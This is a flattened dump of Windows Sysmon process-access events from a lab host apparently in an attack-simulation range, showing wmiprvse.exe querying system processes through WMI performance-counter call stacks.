21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150741Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150740Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150739Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150738Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150737Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150736Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150735Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150734Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150733Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150732Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150731Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150730Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150729Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150728Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150727Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.364{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150726Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 